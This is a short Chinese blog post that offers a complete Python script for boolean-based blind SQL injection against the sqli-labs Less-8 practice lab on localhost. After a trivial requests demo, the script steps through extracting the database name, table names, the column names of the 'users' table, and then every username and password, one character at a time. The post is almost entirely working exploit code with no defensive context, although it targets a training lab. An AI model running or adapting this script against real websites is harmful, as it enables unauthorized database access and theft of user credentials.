基于布尔的盲注入python脚本

 

# coding = utf-8
import requests
 
url = 'http://www.baidu.com'
ret = requests.get(url)
print(type(ret))  # 返回类型 <class 'requests.models.Response'>
print(ret)   # 返回值:<Response [200]>
print(ret.text)  # 输出文本信息
print(ret.content)  # 以二进制输出

  

  1 # coding:utf-8
  2 import requests
  3 
  4 # 获取数据库名长度
  5 def database_len():
  6     for i in range(1, 10):
  7         url = '''http://127.0.0.1/sqli-labs/Less-8/index.php'''
  8         payload = '''?id=1' and length(database())>%s''' % i
  9         # print(url+payload+'%23')
 10         r = requests.get(url + payload + '%23')
 11         if 'You are in' in r.text:
 12             print(i)
 13 
 14         else:
 15             # print('false')
 16             print('database_length:', i)
 17             break
 18 
 19 
 20 database_len()
 21 
 22 #获取数据库名
 23 def database_name():
 24     name = ''
 25     for j in range(1, 9):
 26         for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
 27             url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" % (
 28                 j, i)
 29             # print(url+'%23')
 30             r = requests.get(url + '%23')
 31             if 'You are in' in r.text:
 32                 name = name + i
 33 
 34                 print(name)
 35 
 36                 break
 37     print('database_name:', name)
 38 
 39 
 40 database_name()
 41 
 42 # 获取数据库表
 43 def tables_name():
 44     name = ''
 45     for j in range(1, 30):
 46         for i in 'abcdefghijklmnopqrstuvwxyz,':
 47             url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'" % (
 48                 j, i)
 49             r = requests.get(url + '%23')
 50             if 'You are in' in r.text:
 51                 name = name + i
 52 
 53                 print(name)
 54 
 55                 break
 56     print('table_name:', name)
 57 
 58 
 59 tables_name()
 60 
 61 
 62 # 获取表中字段
 63 def columns_name():
 64     name = ''
 65     for j in range(1, 30):
 66         for i in 'abcdefghijklmnopqrstuvwxyz,':
 67             url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'" % (
 68                 j, i)
 69             r = requests.get(url + '%23')
 70             if 'You are in' in r.text:
 71                 name = name + i
 72 
 73                 print(name)
 74 
 75                 break
 76     print('column_name:', name)
 77 
 78 
 79 columns_name()
 80 
 81 
 82 # 获取username
 83 def username_value():
 84     name = ''
 85     for j in range(1, 100):
 86         for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
 87             url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(username) from users),%d,1)='%s'" % (
 88                 j, i)
 89             r = requests.get(url + '%23')
 90             if 'You are in' in r.text:
 91                 name = name + i
 92 
 93                 print(name)
 94 
 95                 break
 96     print('username_value:', name)
 97 
 98 
 99 username_value()
100 
101 
102 # 获取password
103 def password_value():
104     name = ''
105     for j in range(1, 100):
106         for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
107             url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(password) from users),%d,1)='%s'" % (
108                 j, i)
109             r = requests.get(url + '%23')
110             if 'You are in' in r.text:
111                 name = name + i
112 
113                 print(name)
114 
115                 break
116     print('password_value:', name)
117 
118 
119 password_value()

 

posted @ 2019-05-29 00:27  and1等1  阅读(1494)  评论(0编辑  收藏  举报